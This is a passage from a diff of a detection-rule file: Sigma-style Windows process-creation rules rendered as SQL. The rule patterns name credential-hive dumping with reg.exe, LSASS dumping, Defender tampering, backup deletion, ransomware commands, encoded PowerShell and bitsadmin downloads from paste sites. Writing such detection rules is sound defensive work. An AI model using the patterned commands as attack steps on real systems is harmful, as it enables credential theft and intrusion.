LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE 